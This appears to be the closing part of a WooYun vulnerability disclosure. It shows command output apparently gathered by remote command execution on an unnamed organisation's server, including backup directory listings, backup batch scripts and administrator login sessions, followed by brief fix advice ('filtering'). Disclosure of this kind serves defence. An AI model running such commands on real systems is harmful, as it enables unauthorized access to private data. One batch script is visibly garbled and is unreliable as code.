2014-10-11 10:14 <DIR> DBBackup
2014-09-01 09:21 <DIR> duizhangdan
2012-09-25 11:52 <DIR> ICW
2014-09-26 18:05 169,017,344 i_exchange.mdf
2014-09-26 18:05 1,050,607,616 i_exchange_log.LDF
2012-09-25 10:06 <DIR> Program Files
2013-10-15 17:52 14,753,792 student.mdb
2014-07-03 18:11 <DIR> temp
---
command standard output:
---
驱动器 E 中的卷没有标签。
卷的序列号是 9827-D7D0

E:\DB_Backup\WEBEIMS 的目录

2014-10-15 03:30 <DIR> .
2014-10-15 03:30 <DIR> ..
2014-09-16 03:31 1,048 rar_201409152300.txt
2014-09-16 03:30 163 rar_201409160300.txt
2014-09-17 03:31 1,048 rar_201409162300.txt
2014-09-17 03:30 163 rar_201409170300.txt
2014-09-18 03:31 1,048 rar_201409172300.txt
2014-09-18 03:30 163 rar_201409180300.txt
2014-09-19 03:31 1,048 rar_201409182300.txt
2014-09-19 03:30 163 rar_201409190300.txt
2014-09-20 03:31 1,048 rar_201409192300.txt
2014-09-20 03:30 163 rar_201409200300.txt
2014-09-21 03:32 1,048 rar_201409202300.txt
2014-09-21 03:30 163 rar_201409210300.txt
2014-09-22 03:32 1,048 rar_201409212300.txt
2014-09-22 04:27 1,048 rar_201409220300.txt
2014-09-23 03:31 1,048 rar_201409222300.txt
2014-09-23 03:30 163 rar_201409230300.txt
2014-09-24 03:31 1,048 rar_201409232300.txt
2014-09-24 03:30 163 rar_201409240300.txt
2014-09-25 03:31 1,048 rar_201409242300.txt
2014-09-25 03:30 163 rar_201409250300.txt
2014-09-26 03:32 1,048 rar_201409252300.txt
2014-09-26 03:30 163 rar_201409260300.txt
2014-09-27 03:32 1,048 rar_201409262300.txt
2014-09-27 03:30 163 rar_201409270300.txt
2014-09-28 03:32 1,048 rar_201409272300.txt
2014-09-28 03:30 163 rar_201409280300.txt
2014-09-29 03:32 1,048 rar_201409282300.txt
2014-09-29 04:14 1,048 rar_201409290300.txt
2014-09-30 03:31 1,048 rar_201409292300.txt
2014-09-30 03:30 163 rar_201409300300.txt
2014-10-01 03:31 1,048 rar_201409302300.txt
2014-10-01 03:30 163 rar_201410010300.txt
2014-10-02 03:31 1,048 rar_201410012300.txt
2014-10-02 03:30 163 rar_201410020300.txt
2014-10-03 03:31 1,048 rar_201410022300.txt
2014-10-03 03:30 163 rar_201410030300.txt
2014-10-04 03:31 1,048 rar_201410032300.txt
2014-10-04 03:30 163 rar_201410040300.txt
2014-10-05 03:31 1,048 rar_201410042300.txt
2014-10-05 03:30 163 rar_201410050300.txt
2014-10-06 03:31 1,048 rar_201410052300.txt
2014-10-06 04:14 1,048 rar_201410060300.txt
2014-10-07 03:30 1,048 rar_201410062300.txt
2014-10-07 03:30 163 rar_201410070300.txt
2014-10-08 03:30 1,048 rar_201410072300.txt
2014-10-08 03:30 163 rar_201410080300.txt
2014-10-09 03:31 1,048 rar_201410082300.txt
2014-10-09 03:30 163 rar_201410090300.txt
2014-10-10 03:33 1,048 rar_201410092300.txt
2014-10-10 03:30 163 rar_201410100300.txt
2014-10-11 03:33 1,048 rar_201410102300.txt
2014-10-11 03:30 163 rar_201410110300.txt
2014-10-12 03:34 1,048 rar_201410112300.txt
2014-10-12 03:30 163 rar_201410120300.txt
2014-10-13 03:34 1,048 rar_201410122300.txt
2014-10-13 04:15 1,048 rar_201410130300.txt
2014-10-14 03:38 1,048 rar_201410132300.txt
2014-10-14 03:30 163 rar_201410140300.txt
2014-10-15 03:40 1,048 rar_201410142300.txt
2014-10-15 03:30 163 rar_201410150300.txt
2014-08-11 04:26 4,680,639,752 WEBEIMS_backup_201408110300.rar
2014-08-12 03:31 133,199,967 WEBEIMS_backup_201408112300.rar
2014-08-13 03:31 175,980,039 WEBEIMS_backup_201408122300.rar
2014-08-14 03:31 195,899,522 WEBEIMS_backup_201408132300.rar
2014-08-15 03:31 210,436,235 WEBEIMS_backup_201408142300.rar
2014-08-16 03:31 223,457,325 WEBEIMS_backup_201408152300.rar
2014-08-17 03:32 226,348,062 WEBEIMS_backup_201408162300.rar
2014-08-18 03:32 229,457,328 WEBEIMS_backup_201408172300.rar
2014-08-18 04:27 4,681,841,603 WEBEIMS_backup_201408180300.rar
2014-08-19 03:30 126,715,478 WEBEIMS_backup_201408182300.rar
2014-08-20 03:31 169,609,496 WEBEIMS_backup_201408192300.rar
2014-08-21 03:31 192,622,706 WEBEIMS_backup_201408202300.rar
2014-08-22 03:31 206,738,175 WEBEIMS_backup_201408212300.rar
2014-08-23 03:31 214,484,958 WEBEIMS_backup_201408222300.rar
2014-08-24 03:31 218,425,079 WEBEIMS_backup_201408232300.rar
2014-08-25 03:31 221,635,551 WEBEIMS_backup_201408242300.rar
2014-08-25 04:26 4,683,132,571 WEBEIMS_backup_201408250300.rar
2014-08-26 03:31 161,643,503 WEBEIMS_backup_201408252300.rar
2014-08-27 03:31 207,383,058 WEBEIMS_backup_201408262300.rar
2014-08-28 03:31 228,460,035 WEBEIMS_backup_201408272300.rar
2014-08-29 03:31 242,624,736 WEBEIMS_backup_201408282300.rar
2014-08-30 03:32 251,254,837 WEBEIMS_backup_201408292300.rar
2014-08-31 03:32 254,087,530 WEBEIMS_backup_201408302300.rar
2014-09-01 03:32 257,281,678 WEBEIMS_backup_201408312300.rar
2014-09-01 04:24 4,689,620,233 WEBEIMS_backup_201409010300.rar
2014-09-02 03:31 170,514,933 WEBEIMS_backup_201409012300.rar
2014-09-03 03:31 213,419,308 WEBEIMS_backup_201409022300.rar
2014-09-04 03:31 229,775,487 WEBEIMS_backup_201409032300.rar
2014-09-05 03:31 238,753,045 WEBEIMS_backup_201409042300.rar
2014-09-06 03:32 244,704,212 WEBEIMS_backup_201409052300.rar
2014-09-07 03:32 245,751,763 WEBEIMS_backup_201409062300.rar
2014-09-08 03:32 246,981,393 WEBEIMS_backup_201409072300.rar
2014-09-08 04:26 4,692,468,274 WEBEIMS_backup_201409080300.rar
2014-09-09 03:30 100,720,714 WEBEIMS_backup_201409082300.rar
2014-09-10 03:31 205,802,409 WEBEIMS_backup_201409092300.rar
2014-09-11 03:31 229,294,815 WEBEIMS_backup_201409102300.rar
2014-09-12 03:31 241,129,654 WEBEIMS_backup_201409112300.rar
2014-09-13 03:32 249,195,712 WEBEIMS_backup_201409122300.rar
2014-09-14 03:32 250,274,169 WEBEIMS_backup_201409132300.rar
2014-09-15 03:32 251,870,321 WEBEIMS_backup_201409142300.rar
2014-09-15 04:26 4,697,083,228 WEBEIMS_backup_201409150300.rar
2014-09-16 03:31 166,397,520 WEBEIMS_backup_201409152300.rar
2014-09-17 03:31 194,398,325 WEBEIMS_backup_201409162300.rar
2014-09-18 03:31 212,697,789 WEBEIMS_backup_201409172300.rar
2014-09-19 03:31 223,812,312 WEBEIMS_backup_201409182300.rar
2014-09-20 03:31 230,746,877 WEBEIMS_backup_201409192300.rar
2014-09-21 03:32 233,535,431 WEBEIMS_backup_201409202300.rar
2014-09-22 03:32 236,211,985 WEBEIMS_backup_201409212300.rar
2014-09-22 04:27 4,697,768,799 WEBEIMS_backup_201409220300.rar
2014-09-23 03:31 153,816,840 WEBEIMS_backup_201409222300.rar
2014-09-24 03:31 201,935,521 WEBEIMS_backup_201409232300.rar
2014-09-25 03:31 235,201,398 WEBEIMS_backup_201409242300.rar
2014-09-26 03:32 252,940,144 WEBEIMS_backup_201409252300.rar
2014-09-27 03:32 267,617,711 WEBEIMS_backup_201409262300.rar
2014-09-28 03:32 272,153,873 WEBEIMS_backup_201409272300.rar
2014-09-29 03:32 293,754,404 WEBEIMS_backup_201409282300.rar
2014-09-29 04:14 4,647,321,266 WEBEIMS_backup_201409290300.rar
2014-09-30 03:31 131,264,793 WEBEIMS_backup_201409292300.rar
2014-10-01 03:31 173,456,791 WEBEIMS_backup_201409302300.rar
2014-10-02 03:31 186,482,349 WEBEIMS_backup_201410012300.rar
2014-10-03 03:31 197,265,496 WEBEIMS_backup_201410022300.rar
2014-10-04 03:31 206,408,737 WEBEIMS_backup_201410032300.rar
2014-10-05 03:31 215,321,312 WEBEIMS_backup_201410042300.rar
2014-10-06 03:31 223,980,548 WEBEIMS_backup_201410052300.rar
2014-10-06 03:06 30,586,414,592 WEBEIMS_backup_201410060300.bak
2014-10-06 04:14 4,645,454,822 WEBEIMS_backup_201410060300.rar
2014-10-06 23:00 245,868,032 WEBEIMS_backup_201410062300.bak
2014-10-07 03:30 88,494,770 WEBEIMS_backup_201410062300.rar
2014-10-07 23:00 396,862,976 WEBEIMS_backup_201410072300.bak
2014-10-08 03:30 138,057,963 WEBEIMS_backup_201410072300.rar
2014-10-08 23:00 748,135,936 WEBEIMS_backup_201410082300.bak
2014-10-09 03:31 226,313,873 WEBEIMS_backup_201410082300.rar
2014-10-09 23:00 2,013,767,168 WEBEIMS_backup_201410092300.bak
2014-10-10 03:33 470,196,970 WEBEIMS_backup_201410092300.rar
2014-10-10 23:00 2,103,944,704 WEBEIMS_backup_201410102300.bak
2014-10-11 03:33 492,564,201 WEBEIMS_backup_201410102300.rar
2014-10-11 23:00 2,173,150,720 WEBEIMS_backup_201410112300.bak
2014-10-12 03:34 505,760,487 WEBEIMS_backup_201410112300.rar
2014-10-12 23:00 2,218,239,488 WEBEIMS_backup_201410122300.bak
2014-10-13 03:34 517,458,635 WEBEIMS_backup_201410122300.rar
2014-10-13 03:06 30,906,230,272 WEBEIMS_backup_201410130300.bak
2014-10-13 04:15 4,703,527,283 WEBEIMS_backup_201410130300.rar
2014-10-13 23:01 5,503,559,168 WEBEIMS_backup_201410132300.bak
2014-10-14 03:38 1,100,244,481 WEBEIMS_backup_201410132300.rar
2014-10-14 23:01 6,353,888,768 WEBEIMS_backup_201410142300.bak
2014-10-15 03:40 1,252,179,182 WEBEIMS_backup_201410142300.rar
2013-10-18 15:45 505 WEBEIMS_backup_rar.bat
2013-11-04 15:18 670 WEBEIMS_chaiyi_rar.bat
---
command standard output:
---
echo off
For /F "tokens=1-4 delims=- " %%i in ('Date /t') do (
set V_YEAR=%%i
set V_MONTH=%%j
set V_DAY=%%k
set V_DATE_CODE=%V_YEAR%%V_MONTH%%V_DAY%
)
echo WEBEIMS_backup_%V_YEAR%%V_MONTH%%V_DAY00.BAK

RAR.EXE A WEBEIMS_backup_%V_YEAR%%V_MONTH%%V_DAY00.rar WEBEIMS_backup_%V_YEAR%%V_MONTH%%V_DAY00.BAK > rar_%V_YEAR%%V_MONTH%%V_DAY00.txt
---
command standard output:
---
echo off
@echo off&setlocal enabledelayedexpansion
for /f "tokens=1-3 delims=-:/ " %%a in ("\?da\?74e%") do (set Y=%%a&set M=%%b&set D=%%c&if "!M:~0,1!"=="0" set M=!M:~1!
if "!D:~0,1!"=="0" set D=!D:~1!)
set/a D-=1&if !D! leq 0 (set/a M-=1&if !M!==0 set/a Y-=1,M=12
set/a "T=^!(M-2)","R=(^!(Y%%4)&^!^!(Y%0))|^!(Y%@0)","C=^!(M-4)|^!(M-6)|^!(M-9)|^!(M-11)","D=T*(28+R)+C*30+(^!T&^!C)*31"+D)
set M=0%M%&set D=0%D%
set mydate=%Y%%M:~-2%%D:~-2%
@echo %mydate%

echo WEBEIMS_backup_%mydate#00.BAK

RAR.EXE A WEBEIMS_backup_%mydate#00.rar WEBEIMS_backup_%mydate#00.BAK > rar_%mydate#00.txt
---
command standard output:
---
用户名 会话名 ID 状态 空闲时间 登录时间
administrator 3 唱片 无 2014-7-31 14:33
administrator 4 唱片 无 2014-8-14 16:27
行了 仅作演示 速改。

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝